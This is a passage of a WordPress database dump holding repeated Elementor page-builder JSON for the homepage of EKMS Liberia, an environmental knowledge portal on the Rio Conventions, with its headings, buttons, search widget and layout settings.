fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6048,544,'_elementor_version','2.7.5'),(6049,544,'_elementor_template_type','wp-page'),(6050,544,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6054,545,'_wp_page_template','default'),(6055,545,'_elementor_edit_mode','builder'),(6056,545,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6057,545,'_elementor_version','2.7.5'),(6058,545,'_elementor_template_type','wp-page'),(6059,545,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6061,546,'_wp_page_template','default'),(6062,546,'_elementor_edit_mode','builder'),(6063,546,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all 